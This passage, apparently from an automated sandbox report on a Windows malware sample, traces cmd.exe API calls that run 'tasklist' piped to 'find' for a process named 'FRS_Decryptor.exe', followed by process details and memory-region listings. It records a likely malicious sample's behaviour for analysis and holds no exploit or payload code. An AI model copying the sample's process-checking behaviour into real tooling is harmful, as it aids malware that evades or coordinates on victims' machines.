out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x94f40c*="Desktop") returned 0x1c [0109.274] SetErrorMode (uMode=0x0) returned 0x1 [0109.274] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.274] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.274] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xffffffff [0109.274] GetLastError () returned 0x2 [0109.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.274] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xb25628 [0109.274] FindClose (in: hFindFile=0xb25628 | out: hFindFile=0xb25628) returned 1 [0109.274] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xffffffff [0109.275] GetLastError () returned 0x2 [0109.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xb25628 [0109.275] FindClose (in: hFindFile=0xb25628 | out: hFindFile=0xb25628) returned 1 [0109.275] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.275] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.275] GetConsoleTitleW (in: lpConsoleTitle=0x94f694, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0109.276] InitializeProcThreadAttributeList (in: lpAttributeList=0x94f5c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x94f5a4 | out: lpAttributeList=0x94f5c0, lpSize=0x94f5a4) returned 1 [0109.276] UpdateProcThreadAttribute (in: lpAttributeList=0x94f5c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x94f5ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x94f5c0, lpPreviousValue=0x0) returned 1 [0109.276] GetStartupInfoW (in: lpStartupInfo=0x94f5f8 | out: lpStartupInfo=0x94f5f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x318, hStdError=0x2c)) [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0109.276] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0109.276] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0109.277] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x94f548*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x94f594 | out: lpCommandLine="tasklist", lpProcessInformation=0x94f594*(hProcess=0x64, hThread=0x60, dwProcessId=0x77c, dwThreadId=0x32c)) returned 1 [0109.281] CloseHandle (hObject=0x60) returned 1 [0109.281] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.281] GetEnvironmentStringsW () returned 0xb242d8* [0109.281] FreeEnvironmentStringsA (penv="=") returned 1 [0109.281] DeleteProcThreadAttributeList (in: lpAttributeList=0x94f5c0 | out: lpAttributeList=0x94f5c0) [0109.281] _get_osfhandle (_FileHandle=3) returned 0x54 [0109.281] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0109.281] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0109.281] _close (_FileHandle=5) returned 0 [0109.281] _dup (_FileHandle=0) returned 4 [0109.281] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0109.281] _close (_FileHandle=3) returned 0 [0109.281] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0109.281] SetErrorMode (uMode=0x0) returned 0x0 [0109.281] SetErrorMode (uMode=0x1) returned 0x0 [0109.281] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb242e0, lpFilePart=0x94f664 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x94f664*="Desktop") returned 0x1c [0109.281] SetErrorMode (uMode=0x0) returned 0x1 [0109.282] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.282] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.282] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.282] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.282] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xffffffff [0109.282] GetLastError () returned 0x2 [0109.282] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xb25628 [0109.282] FindClose (in: hFindFile=0xb25628 | out: hFindFile=0xb25628) returned 1 [0109.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xffffffff [0109.282] GetLastError () returned 0x2 [0109.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xb25628 [0109.282] FindClose (in: hFindFile=0xb25628 | out: hFindFile=0xb25628) returned 1 [0109.282] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.282] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.283] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0109.283] SetErrorMode (uMode=0x0) returned 0x0 [0109.283] SetErrorMode (uMode=0x1) returned 0x0 [0109.283] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb24668, lpFilePart=0x94f40c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x94f40c*="Desktop") returned 0x1c [0109.283] SetErrorMode (uMode=0x0) returned 0x1 [0109.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.283] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.283] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xffffffff [0109.283] GetLastError () returned 0x2 [0109.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xb204a0 [0109.283] FindClose (in: hFindFile=0xb204a0 | out: hFindFile=0xb204a0) returned 1 [0109.284] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xffffffff [0109.284] GetLastError () returned 0x2 [0109.284] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x94f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f198) returned 0xb204a0 [0109.284] FindClose (in: hFindFile=0xb204a0 | out: hFindFile=0xb204a0) returned 1 [0109.284] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.284] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.284] GetConsoleTitleW (in: lpConsoleTitle=0x94f694, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0109.284] InitializeProcThreadAttributeList (in: lpAttributeList=0x94f5c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x94f5a4 | out: lpAttributeList=0x94f5c0, lpSize=0x94f5a4) returned 1 [0109.284] UpdateProcThreadAttribute (in: lpAttributeList=0x94f5c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x94f5ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x94f5c0, lpPreviousValue=0x0) returned 1 [0109.284] GetStartupInfoW (in: lpStartupInfo=0x94f5f8 | out: lpStartupInfo=0x94f5f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x318, hStdError=0x2c)) [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0109.284] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0109.285] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0109.285] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0109.285] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x94f548*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x94f594 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x94f594*(hProcess=0x60, hThread=0x54, dwProcessId=0x4e0, dwThreadId=0x4e4)) returned 1 [0109.288] CloseHandle (hObject=0x54) returned 1 [0109.288] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.288] GetEnvironmentStringsW () returned 0xb2ad78* [0109.288] FreeEnvironmentStringsA (penv="=") returned 1 [0109.288] DeleteProcThreadAttributeList (in: lpAttributeList=0x94f5c0 | out: lpAttributeList=0x94f5c0) [0109.288] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0109.288] _close (_FileHandle=4) returned 0 [0109.288] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0109.736] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x94f908 | out: lpExitCode=0x94f908*=0x0) returned 1 [0109.736] CloseHandle (hObject=0x64) returned 1 [0109.736] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0109.738] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x94f908 | out: lpExitCode=0x94f908*=0x0) returned 1 [0109.738] CloseHandle (hObject=0x60) returned 1 [0109.738] _get_osfhandle (_FileHandle=1) returned 0x318 [0109.738] SetConsoleMode (hConsoleHandle=0x318, dwMode=0x0) returned 0 [0109.738] _get_osfhandle (_FileHandle=1) returned 0x318 [0109.738] GetConsoleMode (in: hConsoleHandle=0x318, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0109.738] _get_osfhandle (_FileHandle=0) returned 0x24 [0109.738] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0109.738] SetConsoleInputExeNameW () returned 0x1 [0109.739] GetConsoleOutputCP () returned 0x1b5 [0109.739] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0109.739] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.739] exit (_Code=0) Process: id = "107" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x13518000" os_pid = "0x77c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "106" os_parent_pid = "0x404" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5512 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 5513 start_va = 0x750000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 5514 start_va = 0x770000 end_va = 0x771fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5515 start_va = 0x780000 end_va = 0x78efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5516 start_va = 0x790000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 5517 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5518 start_va = 0x810000 end_va = 0x813fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 5519 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 5520 start_va = 0x830000 end_va = 0x831fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 5521 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5522 start_va = 0x7edd0000 end_va = 0x7edf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edd0000" filename = "" Region: id = 5523 start_va = 0x7edf5000 end_va = 0x7edf5fff entry_point = 0x0 region_type = private name = "private_0x000000007edf5000" filename = "" Region: id = 5524 start_va = 0x7edf9000 end_va = 0x7edf9fff entry_point = 0x0 region_type = private name = "private_0x000000007edf9000" filename = "" Region: id = 5525 start_va = 0x7edfd000 end_va = 0x7edfffff entry_point = 0x0 region_type = private name = "private_0x000000007edfd000" filename = "" Region: id = 5526 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5527 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5528 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5529 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5549 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 5550 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5551 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5552 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5557 start_va = 0x750000 end_va = 0x75ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 5558 start_va = 0x760000 end_va = 0x763fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 5559 start_va = 0x770000 end_va = 0x772fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 5560 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 5561 start_va = 0x850000 end_va = 0x850fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 5562 start_va = 0x860000 end_va = 0x860fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 5563 start_va = 0x870000 end_va = 0x873fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 5564 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 5565 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 5566 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = 